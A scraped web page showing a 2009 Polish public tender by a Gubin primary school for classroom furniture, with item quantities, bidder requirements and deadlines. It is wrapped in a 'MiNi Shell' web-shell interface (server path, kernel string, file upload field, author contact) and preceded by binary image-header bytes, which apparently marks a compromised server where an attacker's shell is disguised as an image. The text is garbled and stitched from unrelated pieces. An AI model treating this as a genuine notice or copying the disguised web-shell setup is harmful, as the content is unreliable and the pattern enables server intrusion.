JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090928/334872-N-2009.html

<p class="kh_header"><b>Gubin: Dostawa mebli szkolnych dla potrzeb Szkoły Podstawowej Nr 3 z Oddziałami Integracyjnymi w Gubinie</b><br>
<b>Numer ogłoszenia: 334872 - 2009; data zamieszczenia: 28.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 3 z Oddziałami Integracyjnymi w Gubinie , ul. Kresowa 48, 66-620 Gubin, woj. lubuskie, tel. 0-68 4558177, faks 0-68 3593125.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka oświatowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli szkolnych dla potrzeb Szkoły Podstawowej Nr 3 z Oddziałami Integracyjnymi w Gubinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest Dostawa mebli szkolnych dla potrzeb Szkoły Podstawowej Nr 3 z Oddziałami Integracyjnymi w Gubinie. Zakres zamówienia obejmuje dostawę m.in.:
1.          Biurek dla nauczycieli - 18 szt.
2.	Foteli obrotowych tapicerowanych - 22 szt.,
3.	Stolików komputerowych 2-osobowych - 24 szt.
4.	Stolików szkolnych 2-osobowych z regulacją wysokości 2 - 4 - 96 szt.
5.	Stolików szkolnych 2-osobowych z regulacją wysokości 4 - 6 - 24 szt.
6.	Stołów szkolnych 2-osobowych nr 4 - 21 szt.,
7.	Stołów szkolnych 2-osobowych nr 5 - 56 szt.,
8.	Stołów szkolnych 2-osobowych nr 6 - 21 szt.,
9.	Krzeseł uczniowskich z regulacją wysokości 4 - 6 - 48 szt.,
10.	Krzeseł uczniowskich z regulacją wysokości 2 - 4 - 192 szt.,
11.	Krzeseł uczniowskich nr 4 - 42 szt.,
12.	Krzeseł uczniowskich nr 5 - 112 szt.,
13.	Krzeseł uczniowskich nr 6 - 42 szt.,
14.	Krzeseł dla sześciolatków - 30 szt.
Kolor płyt meblowych - buk, kolor stelaża jednakowy dla całego zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.16.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2, spełniający warunki określone w  art. 22 ust. 1  ustawy Prawo zamówień publicznych oraz spełniający wszystkie warunki specyfikacji istotnych warunków zamówienia, m.in. : 
1) wykonali w ostatnich 3 latach, a jeżeli okres prowadzenia działalności jest krótszy to w okresie prowadzenia tej działalności, min. 2 zadania z zakresu dostawy mebli szkolnych za kwotę  min. 40.000, 
2) posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 35.000 zł,
3)	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej -  potwierdzające uprawnienia do wykonywania działań lub czynności objętych niniejszym zamówieniem
2.	oświadczenie Wykonawcy o spełnianiu przesłanek zawartych w art. 22 ust. 1 pkt 1-4 u.p.z.p., sporządzone na podstawie wzoru stanowiącego załącznik nr 2 do niniejszej IDW,
3.	wykaz (sporządzony według wzoru stanowiącego  załącznik nr 5 do niniejszej IDW) zawierający potwierdzenie wykonania przez Wykonawcę w okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy to w okresie prowadzenia tej działalności) dostaw podobnych (odpowiadających swoim rodzajem i wartością) do niniejszego zamówienia. Przez dostawę podobną należy rozumieć zamówienie spełniające łącznie następujące warunki: min. 2 zadania, z zakresu dostawy mebli szkolnych za kwotę min. 40.000 zł
4.	dokumenty potwierdzające, że zamówienia wskazane w  załączniku nr 5 do niniejszej IDW zostały wykonane należycie.
5.	formularz Ofertowy, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do niniejszej IDW,
6.	oświadczenie Wykonawcy, na podstawie art. 44 u.p.z.p. o spełnianiu warunków udziału w niniejszym postępowaniu, sporządzone na podstawie wzoru stanowiącego załącznik nr 3 do niniejszej IDW,
7.	oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1-2 u.p.z.p., sporządzone na podstawie wzoru stanowiącego załącznik nr 4 do niniejszej IDW, 
8.	informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w wysokości co najmniej 35.000 zł.
9.	polisa a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
10.	lista obiektów (wraz z danymi kontaktowymi), w których zamontowane są oferowane meble (min. 6 rodzajów z 14 zamawianych mebli),
11.	zdjęcia oferowanych mebli, 
12.	certyfikaty i atesty oferowanych mebli,
13.	akceptacja przez Wykonawcę projektu umowy zawartego w Części II niniejszej SIWZ, sporządzona według wzoru stanowiącego załącznik nr 6 do niniejszej IDW,
14.	w przypadku ofert wspólnych - umowa regulująca współpracę wspólników
15.	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamowienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego,
16.	w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z  właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej - Pełnomocnictwo(a) (pełnomocnictwo rodzajowe),
17.	wypełniony Formularz cenowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - Jakość wykonania (ocena techniczna) - 40</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.gubin.pl  lub  www.sp3gubin.iap.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego - Szkoła Podstawowa Nr 3 w Gubinie, ul. Kresowa 48, Sekretariat Szkoły.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2009 godzina 12:00, miejsce: Szkoła Podstawowa Nr 3 w Gubinie, ul. Kresowa 48, Sekretariat Szkoły.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com